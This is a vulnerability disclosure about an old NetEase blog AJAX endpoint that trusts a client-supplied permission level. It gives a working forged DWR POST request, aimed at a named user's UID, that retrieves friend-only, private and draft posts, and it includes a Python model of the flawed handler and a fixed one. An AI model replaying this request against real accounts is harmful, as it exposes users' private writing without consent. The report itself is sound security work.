Brief description: this vulnerability leaks restricted ("encrypted") logs (friend-only and private visibility) and draft logs from users' blogs.
Detailed description: The AJAX interface of the Netease blog log module transmits the user level (visitor, friend, or blogger) as a request parameter and never validates it; by forging a request you can directly obtain logs that are visible only to friends or only to the blogger. In addition, the interface always returns logs saved as drafts; they are hidden only by a front-end check.
Proof of vulnerability: Taking the blog at http://blog.163.com/blog_admin as an example, the UID 721279 can be obtained from the homepage.
Send an HTTP POST request to the following address:
http://api.blog.163.com/dwr/call/plaincall/BlogBean.getBlogs.dwr
POST parameters (DWR wire format):
callCount=1
scriptSessionId=${scriptSessionId}187
c0-scriptName=BlogBean
c0-methodName=getBlogs
c0-id=0
c0-param0=number:260
c0-param1=number:20
c0-param2=number:721279
c0-param3=boolean:false
c0-param4=number:10000
c0-param5=boolean:false
c0-param6=boolean:false
batchId=1, 687303
Here, param0 and param1 are the number of logs and the starting offset respectively (only logs 260 to 280 are fetched here), param2 is the UID, and param4 is the permission level, where 10000 represents the blogger (the highest level).
The returned data is wrapped as JSONP. After simple parsing, you can find that one of the titles not shown in the public log list is "post real, show the story-blog selfie star"; its address is inaccessible (a "ghost" link), i.e. it is an unpublished draft.
Solution: BlogBean.getBlogs.dwr is the AJAX interface of the old blog version. The new version has been upgraded to BlogBeanNew.getBlogs.dwr, which does not have this vulnerability. We recommend removing the old interface.
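The defect above, modelled as an added Python example (not Netease's code): a handler that trusts the client-supplied level in param4 and always returns drafts, beside a handler that derives the level from the authenticated session and returns drafts only to the owner. The value 10000 for the blogger level and the UID 721279 come from the report; the VISITOR and FRIEND level values, the sample posts and the friend list are constructed assumptions.

```python
from dataclasses import dataclass

VISITOR, FRIEND, BLOGGER = 0, 1000, 10000  # BLOGGER per the report; other values assumed


@dataclass(frozen=True)
class Post:
    title: str
    min_level: int        # lowest level allowed to read the post
    draft: bool = False   # saved as draft, never published


# Constructed sample data for the blog with UID 721279.
POSTS = {
    721279: [
        Post("public post", VISITOR),
        Post("friends only", FRIEND),
        Post("private, blogger only", BLOGGER),
        Post("unpublished draft", VISITOR, draft=True),
    ]
}
FRIENDS = {721279: {1001}}  # constructed: uid 1001 is a friend of the blogger


def get_blogs_vulnerable(blog_uid, start, count, claimed_level):
    """Mirrors the old interface: the level arrives as c0-param4 and is
    taken at face value, and drafts are returned regardless of the level."""
    posts = POSTS.get(blog_uid, [])
    visible = [p for p in posts if p.draft or p.min_level <= claimed_level]
    return [p.title for p in visible[start:start + count]]


def effective_level(blog_uid, session_uid):
    """Derive the level from the authenticated session, never from the request."""
    if session_uid == blog_uid:
        return BLOGGER
    if session_uid is not None and session_uid in FRIENDS.get(blog_uid, set()):
        return FRIEND
    return VISITOR


def get_blogs_fixed(blog_uid, start, count, session_uid):
    """Same paging interface without a client-supplied level; drafts are
    filtered server-side and only ever returned to the blog owner."""
    level = effective_level(blog_uid, session_uid)
    posts = POSTS.get(blog_uid, [])
    visible = [p for p in posts
               if p.min_level <= level and (not p.draft or level == BLOGGER)]
    return [p.title for p in visible[start:start + count]]
```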
Author: XiNGRZ @ wooyun